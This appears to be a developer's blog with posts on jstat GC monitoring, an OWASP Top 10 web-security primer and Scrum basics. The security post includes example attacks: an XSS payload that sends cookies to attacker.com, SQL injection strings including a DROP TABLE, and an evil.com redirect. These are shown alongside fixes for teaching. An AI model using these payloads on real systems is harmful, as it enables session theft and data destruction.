Monday, March 27, 2017

jstat : Java GC Statistics Details

Dear Reader,
Today we will discuss about "jstat". This is Java Virtual Machine Statistics Monitoring Tool.
I use this for watching live GC activity during post Production Deployment specifically if our new build contains 
some JVM tuning or we deploy some thread related fix. You might be using visualvm, jstack, jmap utilities for JVM 
analysis, verbose-gc files for GC. However if your JVM supports, jstat is best tool for watching live GC activities of a Java Process.

The jstat tool displays performance statistics for an instrumented HotSpot Java virtual machine (JVM). 
The below Headers will be displayed in Console report, hence Abbrev are given as below:

Summary of Garbage Collection Statistics:
Column        Description
S0            Survivor space 0 utilization as a percentage of the space's current capacity.
S1            Survivor space 1 utilization as a percentage of the space's current capacity.
E            Eden space utilization as a percentage of the space's current capacity.
O            Old space utilization as a percentage of the space's current capacity.
P            Permanent space utilization as a percentage of the space's current capacity.
YGC            Number of young generation GC events.
YGCT        Young generation garbage collection time.
FGC            Number of full GC events.
FGCT        Full garbage collection time.
GCT            Total garbage collection time.

Complete Details:

E:\Tools>jstat -gcutil 8792 3000    (Java Process Id is 8792, 3000 is Milliseconds interval.)
  S0     S1     E      O      P     YGC     YGCT    FGC    FGCT     GCT  
 99.88   0.00  83.94   0.92  92.06      2    0.061     0    0.000    0.061
 99.88   0.00  83.94   0.92  92.06      2    0.061     0    0.000    0.061
  0.00  99.95   8.73   2.03  99.04      3    0.071     0    0.000    0.071
  0.00  99.95  26.33   2.03  99.51      3    0.071     0    0.000    0.071
 99.86   0.00   3.74  10.45  98.34      4    0.089     0    0.000    0.089
 99.86   0.00  45.33  10.45  98.94      4    0.089     0    0.000    0.089
 99.86   0.00  75.27  10.45  99.43      4    0.089     0    0.000    0.089
  0.00  99.86  15.00  12.74  98.18      5    0.100     0    0.000    0.100
  0.00  99.86  57.14  12.74  98.28      5    0.100     0    0.000    0.100
  0.00  99.86  94.67  12.74  98.41      5    0.100     0    0.000    0.100
 97.80   0.00  26.22  12.74  98.50      6    0.109     0    0.000    0.109
 97.80   0.00  60.60  12.74  98.61      6    0.109     0    0.000    0.109
 97.80   0.00  94.61  12.74  98.72      6    0.109     0    0.000    0.109
  0.00  96.29  37.34  14.30  98.77      7    0.123     0    0.000    0.123
  0.00  96.29  66.33  14.30  98.87      7    0.123     0    0.000    0.123
 61.50   0.00   4.67  17.04  98.92      8    0.137     0    0.000    0.137
 61.50   0.00  42.56  17.04  98.99      8    0.137     0    0.000    0.137
 61.50   0.00  80.11  17.04  99.03      8    0.137     0    0.000    0.137
  0.00  95.05   7.00  19.42  99.07      9    0.153     0    0.000    0.153
  0.00  95.05  45.77  19.42  99.11      9    0.153     0    0.000    0.153
  0.00  95.05  87.16  19.42  99.21      9    0.153     0    0.000    0.153
 20.67   0.00  23.91  20.96  99.34     10    0.162     0    0.000    0.162
 20.67   0.00  55.89  20.96  99.41     10    0.162     0    0.000    0.162
 20.67   0.00  89.74  20.96  99.51     10    0.162     0    0.000    0.162
 .....This will keep printing.....
 
If you have issue regarding ProcessId, use below command to know Processes Running:
jps -l -m -v 


 If you want only limited number of records to see, use below command:
 E:\Tools>jstat -gcutil 8792 1000 6     (8792:ProcessId, 1000:1 Second interval, 6:Only 6 Rows to display and then exit.)
 E:\Tools>jstat -gcutil -h4 8792 1000 100   (-h4: Will reprint Header S0, S1, E etc after every 4 Lines. Total 100 Lines here.)
 
Other type of argument is: "gc": Statistics of the behavior of the garbage collected heap.
-gc:  Garbage-collected heap statistics

Column        Description
S0C        Current survivor space 0 capacity (KB).
S1C        Current survivor space 1 capacity (KB).
S0U        Survivor space 0 utilization (KB).
S1U        Survivor space 1 utilization (KB).
EC        Current eden space capacity (KB).
EU        Eden space utilization (KB).
OC        Current old space capacity (KB).
OU        Old space utilization (KB).
PC        Current permanent space capacity (KB).
PU        Permanent space utilization (KB).
YGC        Number of young generation GC Events.
YGCT    Young generation garbage collection time.
FGC        Number of full GC events.
FGCT    Full garbage collection time.
GCT        Total garbage collection time.
 
E:\Tools>jstat -gc 8792 5000 20
 S0C    S1C    S0U    S1U      EC       EU        OC         OU       PC     PU    YGC     YGCT    FGC    FGCT     GCT
5120.0 5120.0  0.0   4129.1 77312.0  44305.7   175104.0   68584.6   49664.0 24834.0    105    1.065   1      0.096    1.161
5120.0 5120.0  0.0   4129.1 77312.0  46390.8   175104.0   68584.6   49664.0 24834.0    105    1.065   1      0.096    1.161
5120.0 5120.0  0.0   4129.1 77312.0  52546.8   175104.0   68584.6   49664.0 24834.0    105    1.065   1      0.096    1.161
5120.0 5120.0 5116.1  0.0   77312.0   210.1    175104.0   69184.6   49664.0 24834.4    106    1.078   1      0.096    1.174
5120.0 5120.0 5116.1  0.0   77312.0  36339.2   175104.0   69184.6   49664.0 24834.4    106    1.078   1      0.096    1.174
5120.0 5120.0 5116.1  0.0   77312.0  74165.2   175104.0   69184.6   49664.0 24834.4    106    1.078   1      0.096    1.174
5120.0 5120.0  0.0   4000.0 77312.0  27741.9   175104.0   71402.5   49664.0 24834.4    107    1.086   1      0.096    1.182
5120.0 5120.0  0.0   4000.0 77312.0  60018.1   175104.0   71402.5   49664.0 24834.4    107    1.086   1      0.096    1.182
5120.0 5120.0 3904.0  0.0   77312.0  16572.7   175104.0   73227.0   49664.0 24834.4    108    1.097   1      0.096    1.193
5120.0 5120.0 3904.0  0.0   77312.0  53046.6   175104.0   73227.0   49664.0 24834.5    108    1.097   1      0.096    1.193
5120.0 5120.0  0.0   3713.1 77312.0   8212.0   175104.0   74979.1   49664.0 24834.5    109    1.105   1      0.096    1.201
5120.0 5120.0  0.0   3713.1 77312.0  43119.1   175104.0   74979.1   49664.0 24834.5    109    1.105   1      0.096    1.201
5120.0 5120.0 4352.0  0.0   77312.0   1189.1   175104.0   76731.5   49664.0 24834.5    110    1.110   1      0.096    1.206
5120.0 5120.0 4352.0  0.0   77312.0  36556.2   175104.0   76731.5   49664.0 24834.5    110    1.110   1      0.096    1.206
5120.0 5120.0 4352.0  0.0   77312.0  68395.2   175104.0   76731.5   49664.0 24834.5    110    1.110   1      0.096    1.206
5120.0 5120.0  0.0   4353.1 77312.0  27265.7   175104.0   78299.5   49664.0 24834.5    111    1.117   1      0.096    1.213

More Details: http://docs.oracle.com/javase/7/docs/technotes/tools/share/jstat.html
--------------------------------------END------------------------------------------ 

Thursday, March 16, 2017

Security and Vulnerability for Web Applications

What are Securities in a Product:
    Web Application Security,
    Network Security, 
    Infrastructure Security, 
    Database Security, and
    Operational Security.
    
What are Vulnerabilities: Unchecked input while processing at Server Side, which results malicious changes in Web App.

Why Security and Vulnerability Need to be addressed: 
    For PCI-DSS Compliance 
    Securing Applications from Hackers
    Saving Innocent Consumers
    
Agenda: What is Web Application Security?
Web Application Security: Deals specifically with security of websites and web applications. A majority of the attacks against 
Web servers are through network firewalls and through the http(80) or https(443) ports. Some of the most commonly used hacking
techniques include Denial of service, Leakage, Cross-site scripting, SQL injection. DENIAL OF SERVICE: Attacks causes Excessive 
CPU Consumption, Excessive Disk I/O Consumption and Excessive Network I/O Consumption, causes service not available to real users.
    
An attacker has two goals for this:
    1) Inject malicious data into Web App.
    2) Manipulate Web App using malicious data.

1) Inject malicious data into Web App.
Parameter Tampering
URL Manipulation
Hidden Field Manipulation
HTTP Header Tampering
Cookie Poisoning

2) Manipulate Web App using malicious data.
SQL Injection
Cross-Site Scripting
HTTP Response Splitting
Path Traversal
Command Injection


OWASP: Open Web Application Security Project
It is an Online community which creates freely-available articles, methodologies, tools and technologies in the 
field of web application security. OWASP was started on September 9, 2001.

OWASP came with Top 10 types of regular critical issues which was first published in 2003 and is regularly updated.
OWASP Site list out the issue and their solutions too in their respective Testing Guide, which can be checked.
OWASP is the de facto standard for designing and testing secure web applications.


Other guidelines are:
    Threat Modeling processes such as STRIDE and DREAD
    OWASP’s Software Assurance Maturity Model (OpenSAMM)
    Open Security Testing Methodology Manual (OSTMM)
    Web Application Security Consortium (WASC) guidelines

Testing of Web Application before build release to Production is called Vulnerability Assessment and Penetration Testing (VAPT).
Which company does this security testing: Paladion, Veracode, Netragard, IBM Rational.


OWASP Top 10 Issues:
A1- Injection: SQL, OS, LDAP Injection as part of a command or Query.
A2- Broken Authentication and Session Management: Attackers hijack sessions, get hold of session tokens and Passwords 
    if these are not implemented correctly in web applications. 
    Ex: Airline reservations application supports URL rewriting, putting session IDs in the URL:
    http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii
    An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without 
    knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.
    http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii
    
    Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” 
    the user simply closes the browser tab and walks away. Attacker uses the same browser Few Minutes Later, and that browser 
    is still authenticated.
    
A3- Cross Site Script (XSS): XSS allows attackers to execute Java Scripts in the victim's browser which can hijack 
    user sessions, deface web sites or redirect the user to malicious sites.
    
    http://www.example.com/saveComment?comment=Great+Site!
    Server Reply:
        <h3> Thank you for your comments! </h3>
        You wrote:
        <p/>
        Great Site!
        <p/>
    
    http://wwww.example.com/saveComment?comment=<script>alert('xss');</script>
    Server Reply: 
        <h3>Thank you for your comments!</h3>
        You wrote:
        <p/>
        <script>alert('xss');</script>
        <p/>
    
    The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
    (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
    The attacker modifies the 'CC' parameter in their browser to:
    '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

    This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
    Solution: Replace "<", "Script" kind of words/characters with html encoded entities.
    
A4- Insecure Direct Object References: This occurs when a developer exposes a reference to an internal implementation 
    object such as file, directory, database username/password without an access control check.
    String query = "SELECT * FROM accts WHERE account = ?";
    PreparedStatement pstmt = connection.prepareStatement(query , … );
    pstmt.setString( 1, request.getParameter("acct"));
    ResultSet results = pstmt.executeQuery( );
    http://example.com/app/accountInfo?acct=notmyacct  (Modified by hacker).

A5- Security Misconfiguration: Security settings must be defined in prod environment. Default Security Settings are 
    often insecure. Softwares too must be kept upto date with all security patch installation.

A6- Sensitive Data Exposure: CreditCards, DOB, Authentication Credentials, CVV2. Attackers may steal or modify such 
    weekly protected data to conduct Credit Card Fraud, Identity Theft. These data must be encrypted and kept.    

A7- Missing Function Level Access Control (Private, Public visibility of URLs and Patterns.) In our case, only "/csr"
    link is visible from CSR from public IP. 
    http://example.com/app/getappInfo  
    http://example.com/app/admin_getappInfo   (admin has logged in, next time hacker simply will use this URL.)
    If an unauthenticated user can access either page, that’s a flaw. If an authenticated, non-admin, user is allowed 
    to access the admin_getappInfo page, this is also a flaw.
    
A8- Cross Site Request Forgery (CSRF): Attacker sends a forged HTTP Request page, including session cookie and any other 
    authentication information and get the job done. It is also known as a one-click attack or session riding and abbreviated 
    as CSRF or XSRF.

A9- Using Components with Known Vulnerabilities: Libraries, Frameworks, other software components with knows vulnerabilites 
    are prone to attack. These causes serious data loss or server takeover. Should read the third party components issues and loopholes.
    
A10-Unvalidated Redirects and Forwards: Attackers can redirect Victims to phishing or malware sites or use forwards to 
    access unauthorized pages. Ex: The application has a page called “redirect.jsp” which takes a single parameter named “url”. 
    The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.
    http://www.example.com/redirect.jsp?url=evil.com


    
1) Inject malicious data into Web App.
Parameter Tampering: Parameter Pollution Attack
    http://localhost:9090/MyDiaryWeb/sum?n1=45&n1=4&n2=50
    
URL Manipulation:     
        Original: http://www.mybank.com/myaccount?accountnumber=11111&debit_amount=100
        Modified: http://www.mybank.com/myaccount?accountnumber=11111&debit_amount=-5000  (Increase the account balance)

Hidden Field Manipulation: 
    Set hidden fields of HTML forms in Web pages to malicious values. Because HTTP is stateless, many Web applications use 
    hidden fields to emulate persistence. Hidden fields are just form fields made invisible to the end-user. 
    For example, consider an order form that includes a hidden field to store the price of items in the shopping cart:
    <input type="hidden" name="total_price" value="25.00">    
    A typical Web site using multiple forms, such as an online store will likely rely on hidden fields to transfer state 
    information between pages. Unlike regular fields, hidden fields cannot be modified directly by typing values into an 
    HTML form. However saving the HTML page, editing the hidden field value, and reloading the page will cause the Web 
    application to receive the newly updated value of the hidden field.
    
HTTP Header Tampering: Manipulate parts of HTTP Header Requests sent to the application.

Cookie Poisoning: Place malicious data in cookies, small files sent to Web-based applications.
    Many Web applications use cookies to store information such as user login/password pairs and user identifiers. 
    This information is often created and stored on the user's computer after the initial interaction with the Web application, 
    such as visiting the application login page. Cookie poisoning is a variation of header manipulation: malicious input can be 
    passed into applications through values stored within cookies. Because cookies are supposedly invisible to the user, cookie 
    poisoning is often more dangerous in practice than other forms of parameter or header manipulation attacks.

2) Manipulate Web App using malicious data.
SQL Injection: Pass input containing SQL commands to a database server for execution.
Cross-Site Scripting: exploit applications that output unchecked input and trick the user into executing malicious scripts.
HTTP Response Splitting: 
Path traversal: exploit unchecked user input to control which files are accessed on the server.
Command Injection: exploit user input to execute shell commands.
Password-Guessing attack: Brute Force Attacks with different combination of Letters, Numbers and Symbols, till it cracks.


Other Security issues:
1) Broken Link: A broken link refers to any link that should take you to a document, image or webpage, that actually results 
    in an error. This page was linked from the website but it is inaccessible.

2) Cookies must be set with "HTTPOnly" flag set. When a cookie is set with the HTTPOnly flag, it instructs the browser that the 
    cookie can only be accessed by the server and not by client-side scripts. This is an important security protection 
    for session cookies. HTTPOnly limits the ability of JavaScript and other client-side scripts to access cookie data. 
    This cookie attribute will prevent JavaScript from reading or writing to HTMLOnly labeled cookies, preventing some forms 
    of cross-site scripting. 
    response.setHeader("SET-COOKIE", "JSESSIONID=" + session.getId() + "; Path=/csr; HttpOnly; Secure");    
    
3) Clickjacking is a malicious technique of tricking a Web user into clicking on something different from what the user perceives 
    they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking 
    on seemingly innocuous (not injurious) web pages. Solution is the server should return an X-Frame-Options header which means 
    that their content is not embedded into other sites. Sites can use this to avoid clickjacking attacks. 
    response.setHeader( "X-FRAME-OPTIONS", "DENY" );
    
4) HTTP OPTIONS method should be Disabled on the web server. The OPTIONS method provides a list of the methods that are supported 
    by the web server, it represents a request for information about the communication options available on the request/response chain.    
    This will enable more advanced attacks by hackers. Solution is Config change in web.xml (below config will disable all methods
    except HEAD and GET):
     <security-constraint>
        <web-resource-collection>
            <web-resource-name><strong>restricted methods</strong></web-resource-name>
            <url-pattern>/*</url-pattern>
            <http-method>PUT</http-method>
            <http-method>POST</http-method>
            <http-method>DELETE</http-method>
            <http-method>OPTIONS</http-method>
            <http-method>TRACE</http-method>
        </web-resource-collection>
        <auth-constraint />
    </security-constraint>

5) Restrict access to the Web Server (JBOSS) Web Service Console, Management Console, Index pages apart from Web App.    

Solutions:
SQL Injection: Use PreparedStatement, get the values and use setInt, setString, setDate kind of APIs.
    String sql = "SELECT * FROM ACCOUNTS where ACC_ID='"+accId+"'";
    
    //http://localhost:9090/MyDiaryWeb/account?accId=1000' OR '1'='1
    //SELECT * FROM ACCOUNTS WHERE ACC_ID = '   1000' or '1'='1   ';
    
    //http://localhost:9090/MyDiaryWeb/account?accId=1000'; DROP TABLE Suppliers;
    //SELECT * FROM ACCOUNTS WHERE ACC_ID = '1000'; DROP TABLE Suppliers;
Parameter/Field Manipulation: Use Request, Session Tokens and Change on every Click in CSR.
Code Review.
Change JSessionId on Every Click in Web Application. To do this "Store all Session variables into new Session except JSessionId".
Lock the Account to save User from Password Guessing Attack after a defined number of incorrect password attempts.


Tools Used For Reproducing Issue and Fix Testing:
    OWASP CSRF Tester
    BurpSuite
    Acunetix

Wednesday, March 8, 2017

The Scrum Framework

Scrum is Agile framework for completing complex projects, used by Fortune 500 companies around the world. 
In Rugby sport, scrum means "restart the game." 
This requires high-performing, cross-functional teams (Dev, QA, Project Manager basically) to work and interact almost on 
daily basis at the begining of the day to assess progress. Scrum Teams are very different from traditional development groups. 

Sprint: In product development, a sprint is a set period of time during which specific work has to be completed and made ready 
    for review. The duration of a sprint is determined by the scrum master, the team's facilitator. Once the team reaches a 
    consensus for how many days a sprint should last, all future sprints should be the same. After a sprint begins, the product 
    owner must step back and let the team do their work. During the sprint, the team holds daily stand up meeting to discuss 
    progress and brainstorm solutions to challenges. Sprints are usually from 2 to 4 weeks period.

Scrum in Detail:
1) A Product owner creates a prioritized list of ideas (wish list) for the product called a Product Backlog. The product backlog helps 
    the team break the product into smaller, more manageable pieces and build it incrementally in a series of short time periods called 
    Sprints. Sprints typically last 2 to 4 weeks.
    Ex: If you want to develop facebook like product, then you will make a list of all the required items:
        Login
        Logout
        Registration Page
        Change password
        Profile Picture
        Profile Messages
        Photos Upload
        Photos Edit
        Profile Search 
        Friendship Requests etc (List of around 80-100 items).        
    
2) During sprint planning, the team pulls a small chunk from the top of that wish list (first set of basic items to be delivered to client) 
    called a sprint backlog, and decides how to implement those pieces. 
3) It also considers First 1-2 Weeks for the enviroment setup for starting product development.
4) The team has a certain amount of time (sprint) to complete its work, but it meets each day to assess its progress (daily Scrum).

5) Along the way, the ScrumMaster keeps the team focused on its goal. The ScrumMaster also removes impediments for the team, so everyone 
    can focus and move forward with their work.
6) At the end of the sprint, the work should be potentially shippable (Demo): ready to hand to a customer or show to a stakeholder.
7) The sprint ends with a sprint review and retrospective.
8) As the next sprint begins, the team chooses another chunk of the product backlog and begins working again.
9) This Sprint cycle repeats until enough items in the product backlog have been completed, the budget is depleted, or a deadline arrives.